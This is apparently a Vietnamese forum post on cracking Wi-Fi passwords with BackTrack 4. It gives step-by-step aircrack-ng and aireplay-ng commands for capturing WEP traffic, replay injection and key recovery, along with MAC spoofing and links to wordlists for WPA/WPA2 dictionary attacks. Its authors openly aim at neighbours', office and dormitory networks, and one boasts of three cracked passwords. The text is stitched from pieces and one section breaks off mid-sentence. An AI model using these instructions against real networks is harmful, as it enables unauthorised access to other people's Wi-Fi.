"BACKTRACK" CÔNG CỤ HACK WIFI HÀNG ĐẦU THẾ GIỚI DÙNG CHO MỌI HỆ ĐIỀU HÀNH bước 1 downnload BACKTRACK 4 beta KHI DOWN FILE ISO VỀ BURN RA ĐĨA VÀ BOOT --> MÌNH DÙNG LIVE CD http://www.backtrack-linux.org/downloads/ bước 2 download tài liệu về --> dành cho những bạn thích hiểi rõ về cấu trúc của nó mediafire http://www.mediafire.com/?sharekey=9...4e75f6e8ebb871 CÁI NÀY MÌNH LIỆT KÊ RA CHO NHỮNG BẠN LƯỜI ĐỌC MÀ CHỈ THIX HACK LIỀN LƯU Ý KHI DÙNG BACKTRACT THEO TÀI LIỆU 1.BT 4 beta 2.để tự động boot không chỉnh bất cứ dòng nào 3.login:root 4.pass:toor 5.mở bảng conshole:có 1 ô màu đen bé xíu kế bên startmenu CÁC BẠN LÀM THEO DÒNG LỆNH SAU 1.iwconfig-->xem tên card mình đang dùng mình dùng card interface là wlan0 nên---> nên xem tài liêu ở trên để hiễu rõ hơn 2.airmon-ng 3.airmon-ng stop wlan0 4.airmon-ng start wlan0 5.airodump-ng --ivs --write capturefile wlan0 6.airodump-ng --ivs --channel {ap channel} --bssid {ap bssid} --write capturefile wlan0 7.aireplay-ng --arpreplay -b {ap bssid} -h {client MAC from airodump} wlan0 8.aircrack-ng -b {ap bssid} thế là đã có wep key -->mình khuyên các bạn nên đọc tài liệu trên để hiểu hơn (100% thành công) lượng DATA tối thiểu nên chờ là 40 000 nha các bạn Change MAC nếu cần thiết change mac: thực hiện theo các lệnh sau -(...) tên interface như WLAN0 chẳng hạn airmon-ng airmon-ng stop ... iconfig ... down macchanger --mac 00:11:22:33:44:55 ... airmon-ng start ... và khi đã monitor , thì bạn tiếp tục thưc hiện các lệnh kế , và bây giờ bạn ko cần quan tâm station cũa người ta (khi đến lệnh nào mầ phải điền station thì bạn điền 00:11 ..etc have fun bác nào khi chạy iwconfig ko có thông tin card wifi của mình thì nên vào: những hardware chạy dc trên BT4 những hardware hông hỗ trợ trên BT4 vô đó search theo loại card mà mình sử dụng, ko cần phải đăng kí để search 1 VÀI DICTIONARY CHO NHỮNG AI HACK WPA & WPA2 Code: http://websecurity.ro/downloads/dictionary.tar.gz 18M Code: http://upload.gibbocool.com/files/28GBwordlist.rar 74MB Code: http://rapidshare.com/files/98295454/huge_wordlist.rar 78MB lưu ý : các dictionary ở trên khi extract ra sẽ có dung lượng vài chục GB ,nên hãy xem xét trườc khi down còn đây là trang web chứa dictonary ,ai thix thì vào tìm hiểu,có luôn các tool để làm wordlist. Nhưng tạo wordlist thường thường tử 3-8 ký tự alphanumeric không cũng đã vài GB rồi Code: http://packetstormsecurity.org/Crackers/wordlists/utilities NGOÀI RA CÒN CÓ THÊM HÀNG CHUC PHẦN MỀM HACK KHÁC THAM KHẢO TẠI : http://win7dl.com/download/download+...o+8122009.html NOTE---WPA,WPA2 Hi, Tôi hay lang thang thấy các diễn đàn có nhiều người hỏi về crack passwork wirless để xài chùa, và có rất nhiều bài hướng dẫn làm điều đó, chủ yếu dùng aircrack trên *nix và Abel & Cain trên Windows hoặc BACKTRACK. Bản thân thôi chỉ mới thử dùng aircrack trên Ubuntu để thử dò cái pass của nhà bên cạnh và lên cơ quan dò thử (cả 2 đều dùng WPA). Kết quả đều là con số 0. Sau đó tôi nhận ra rằng để dò được pass thì trong dictionary phải có cái pass đó thì mới có cơ may. Mà ở VN thường có kiểu đặt pass theo kiểu nói trại đi, biến từ biến ngữ, ví dụ như là : - kute, cut3, kut3 (cute) - 9girls, nic3girls (nice girls) - d0g (dog) - ... Với kiểu nói và viết như vậy và khi đặt pass cũng đặt như vậy thì tôi dám khẳng định việc crack pass WPA là không thể. Tôi đã từng thử với bộ từ điển search được trên mạng có size là 10 Mb (file text mà 10 Mb thì thử hình dung nó chứa bao nhiêu từ ) mà cũng không dò được pass. Bên cạnh đó với kiểu đặt theo strong password có chữ số, ký tự đặc biệt, vd : - emkut3@^_^ - |-|3L0 |-|@c|ko do dc MAC va Kenh) 3,ban khoi dong lai may....cho dia BT4 beta vao va an F12...bam Enter thi phai...... cho cho no chay xong ... go lenh startx vao luc nay no se hien len cua so chinh cua BT4 co giao dien nhu ban xem video huong dan luon...cung kha giong giao dien cua win do.... 4, ban go lenh airmon-ng roi bam enter de bit dc cac wifi minh duong...thuong la wlan0 ,neu ban dung 1 cac wifi 5, ban go tiep lenh airodump-ng -w wep -c (kenh) --bssid (Mac) wlan0 bam enter Vidu: airodump-ng -w wep -c 11 --bssid 00:1a:2b:2b:45:10 wlan0 luc nay cac thong so bat dau chay nhung co the con cham...nhat la data co the tang rat cham 6, Ban go tiep lenh aireplay-ng -10 -a (Mac) wlan0 vi du: aireplay-ng -10 -a 00:1a:2b:2b:45:10 wlan0 7, ban go tiep lenh aireplay-ng -3 -b (mac) wlan0 luc naycac goi packets bat dau gui di...luong data bat dau tang nhanh....nhung cung co the ban phai cho khoang 10 den 15 phut thi khi do data tang moi nhanh..toi da phai thu di thu lai rat nhieu lan 8.Ban cho cho luong data len khoang tren 30 000 hoac 40 000 hoac lon hon (luc nay data co the dat den con so nay thi no phai chay cung nhanh roi...chu ko tang cham nhu luc dau nua) Tiep theo ban go lenh dir thi no se hien ra ten five ma minh da luu cac du lieu gui va nhan packets co dang wep-01.cap hoac wep-02.cap.... 9 ban go tiep lenh aircrack-ng -wep-01.cap (tuy theo ten thu duoc ma lenh tren ban go) luc nay la ket qua.. key fond se hien ra...va do la pass ma minh can tim.... Chu y: 1. ban phai go dung lenh tung khoang trong, dau cach"-" ,neu ko thi no se ko chay ....luc dau toi cung da go sai nhieu lan.... 2. Toi dung lap top HP...cac mang wifi cua toi la loai boocam thi phai....va cung da dung usb Wifi dlink534 cung co ho tro de crack...ngoai ra toi da thu dung voi 2may khac la loai asus cua 2 thang ban thi nhu hinh ko ho tro thi phai...go lenh vao ma no ko chay cac thong so.... Tren la mot so buoc toi da lam va da thanh cong...pha duoc 3 cai pass roi...Toi o kitucxa..pha dc mot cai pas ma chua qua 3 ngay ca kituc deu bit...pass...nguoi ta ma tra ra thi het duong chay toi... co the thay rang nhu cau dung wifi chua rat lon...hihi:d